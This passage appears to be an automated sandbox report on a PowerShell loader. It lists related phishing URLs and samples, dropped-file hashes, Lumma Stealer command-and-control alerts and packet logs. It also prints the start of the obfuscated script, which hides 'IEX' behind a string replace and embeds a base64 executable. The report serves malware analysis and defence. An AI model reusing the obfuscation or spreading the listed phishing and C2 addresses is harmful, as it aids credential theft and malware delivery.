	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	ithDgrzsHr.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Ecastillo-In Service Agreement.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://www.affordablehousing.com/MaineCWL	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Payment Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.107.246.45
	https://microsoft-visio.en.softonic.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	tpmbypassprivatestore.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	hhcqxkb.exe	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://xucr.vafdcekgwp.ru/aIDt6/	Get hash	malicious	HTMLPhisher	Browse	104.18.161.117
	Message.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://jooracces.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9	Get hash	malicious	Unknown	Browse	172.67.201.81
	http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Ecastillo-In Service Agreement.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://www.affordablehousing.com/MaineCWL	Get hash	malicious	Unknown	Browse	104.17.31.174
	Message.eml	Get hash	malicious	HTMLPhisher	Browse	162.159.128.61
	https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	172.67.186.98
	RFQ_AS0101402025.22025_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	mWAik6b.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	lumma1.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	VRO.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	VRO.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	Y4TyDwQzbE.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	DYv2ldz5xT.exe	Get hash	malicious	Unknown	Browse	104.21.80.1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nllluldhz/lL:NllU
MD5:	03744CE5681CB7F5E53A02F19FA22067
SHA1:	234FB09010F6714453C83795D8CF3250D871D4DF
SHA-256:	88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
SHA-512:	0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................L..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp3suq5l.gtp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3ufdayp.g3z.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7101480256233854
Encrypted:	false
SSDEEP:	48:KrD/l0tf0Y3CycU2UfzukvhkvklCywYHVBkglHJfSogZosnVBkglSfSogZoI1:a/Y3C6TKkvhkvCCtgVBkgOHFVBkg3Hv
MD5:	5BFE1E441998FCBA71426905BEDDC148
SHA1:	CC995008A55CF4759A8A9A40D8D9B9B560145405
SHA-256:	60E4021C7C8CA8D7B1B62CDAA28DC318CE9620A13F36DAFE777F964F4FBD209B
SHA-512:	61E51FEE9DC57596C46DCB9992FEAD9627BF7131743BFAFD0F9AB4394D137E19CB28F8B8F6B6EF4380A3617B58AE7D6D69F3BFE5B6A7D960D1B47D851C12F918
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S...b...f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....H..f.......f......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Zh............................^.A.p.p.D.a.t.a...B.V.1......Ze...Roaming.@......EW<2.Ze...../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Zc.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Zc.....2......................E..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Zc.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Zc.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Zi.....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IC9Y7NM5VEF8QUBZHVZS.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7101480256233854
Encrypted:	false
SSDEEP:	48:KrD/l0tf0Y3CycU2UfzukvhkvklCywYHVBkglHJfSogZosnVBkglSfSogZoI1:a/Y3C6TKkvhkvCCtgVBkgOHFVBkg3Hv
MD5:	5BFE1E441998FCBA71426905BEDDC148
SHA1:	CC995008A55CF4759A8A9A40D8D9B9B560145405
SHA-256:	60E4021C7C8CA8D7B1B62CDAA28DC318CE9620A13F36DAFE777F964F4FBD209B
SHA-512:	61E51FEE9DC57596C46DCB9992FEAD9627BF7131743BFAFD0F9AB4394D137E19CB28F8B8F6B6EF4380A3617B58AE7D6D69F3BFE5B6A7D960D1B47D851C12F918
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S...b...f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....H..f.......f......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Zh............................^.A.p.p.D.a.t.a...B.V.1......Ze...Roaming.@......EW<2.Ze...../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Zc.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Zc.....2......................E..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Zc.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Zc.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Zi.....u...........

Static File Info

General

File type:	ASCII text, with very long lines (65478), with CRLF line terminators
Entropy (8bit):	5.488652867474763
TrID:
File name:	87.247.158.212.ps1
File size:	538'493 bytes
MD5:	5259076d6fd45bf7ddbb866c169541db
SHA1:	67549b5a010f40a004558b2c250829c9dc4d869b
SHA256:	4154e02a0d922fefb72812b972808dbf6c3f0a9108f577b641c9a57cf8d8d342
SHA512:	17faa2a63e9cc2e927f517ce34bdfc17e4d2229b9eb745dcbabd84c2800e853c4fa9fb0e2ef7420f1d259137dc37394fe0e7e7972520de79067837f7cff7cfc1
SSDEEP:	6144:eVe/8jH/fkbaAiHnVExoyZYwOiY1LBSUkf2jFgdIVgMbJN+5PVu1Zhn6w/lAVigM:eFwoW2h7dVI42CoeUJ2z6m20VFqwg2
TLSH:	20B46D3240537C5F3B9B2ECEA4006EC00C5839A77618D154AE899276F2FD53A9E6D9FC
File Content Preview:	.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T17:59:21.771472+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49753	104.21.80.1	443	TCP
2025-01-14T17:59:22.592799+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49753	104.21.80.1	443	TCP
2025-01-14T17:59:22.592799+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49753	104.21.80.1	443	TCP
2025-01-14T17:59:23.210705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49762	104.21.80.1	443	TCP
2025-01-14T17:59:23.710134+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49762	104.21.80.1	443	TCP
2025-01-14T17:59:23.710134+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49762	104.21.80.1	443	TCP
2025-01-14T17:59:24.385499+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49771	104.21.80.1	443	TCP
2025-01-14T17:59:26.310956+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49771	104.21.80.1	443	TCP
2025-01-14T17:59:26.805899+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49788	104.21.80.1	443	TCP
2025-01-14T17:59:27.992894+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49795	104.21.80.1	443	TCP
2025-01-14T17:59:29.294796+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49805	104.21.80.1	443	TCP
2025-01-14T17:59:30.559974+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49815	104.21.80.1	443	TCP
2025-01-14T17:59:34.190046+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49834	104.21.80.1	443	TCP
2025-01-14T17:59:34.671116+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49834	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 17:59:21.279568911 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.279607058 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:21.279736042 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.288333893 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.288368940 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:21.771305084 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:21.771471977 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.773001909 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.773019075 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:21.773281097 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:21.822938919 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.823894024 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.823894024 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:21.824063063 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.592856884 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.593096018 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.593170881 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.595894098 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.595927954 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.595968008 CET	49753	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.595978022 CET	443	49753	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.604852915 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.604887962 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:22.604959011 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.605338097 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:22.605355024 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.210639954 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.210705042 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.212441921 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.212451935 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.212774038 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.216825008 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.216842890 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.216922998 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710212946 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710356951 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710410118 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.710438013 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710532904 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710587978 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.710597038 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710721016 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710764885 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.710772991 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710881948 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.710930109 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.710937977 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.711039066 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.711085081 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.711092949 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.711201906 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.711250067 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.711257935 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.760242939 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.788885117 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.789074898 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.789124966 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.789143085 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.789295912 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.789349079 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.790065050 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.790077925 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.790090084 CET	49762	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.790096045 CET	443	49762	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.917556047 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.917597055 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:23.917695999 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.921485901 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:23.921523094 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:24.385282040 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:24.385499001 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:24.392254114 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:24.392263889 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:24.392510891 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:24.394099951 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:24.394275904 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:24.394310951 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.310996056 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.311225891 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.311364889 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.311467886 CET	49771	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.311489105 CET	443	49771	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.326801062 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.326839924 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.326941967 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.327867985 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.327883005 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.805788040 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.805898905 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.811522007 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.811541080 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.811805964 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.815902948 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.819224119 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.819258928 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:26.819334984 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:26.863331079 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.351821899 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.351970911 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.352111101 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.353420973 CET	49788	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.353441954 CET	443	49788	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.508323908 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.508353949 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.508424997 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.508708954 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.508727074 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.992801905 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.992893934 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.994112968 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.994129896 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.994338036 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.995449066 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.995605946 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.995637894 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:27.995704889 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:27.995716095 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:28.700587988 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:28.700714111 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:28.700786114 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:28.701663971 CET	49795	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:28.701683044 CET	443	49795	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:28.835355043 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:28.835365057 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:28.835427999 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:28.835715055 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:28.835731030 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.294698000 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.294795990 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.295919895 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.295926094 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.296221972 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.297483921 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.297589064 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.297595024 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.788481951 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.788593054 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:29.788644075 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.788754940 CET	49805	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:29.788764954 CET	443	49805	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.099453926 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.099534035 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.099946022 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.099946022 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.099992037 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.559654951 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.559973955 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.561146975 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.561172009 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.561429024 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.562844992 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.563668013 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.563718081 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.563806057 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.563838959 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.563956022 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564008951 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564133883 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564160109 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564285040 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564318895 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564466000 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564512014 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564523935 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564532042 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564666986 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564694881 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.564712048 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564846039 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.564876080 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.573821068 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.573942900 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.573973894 CET	443	49815	104.21.80.1	192.168.2.6
Jan 14, 2025 17:59:30.573999882 CET	49815	443	192.168.2.6	104.21.80.1
Jan 14, 2025 17:59:30.574023008 CET	443	49815	104.21.80.1	192.168.2.6
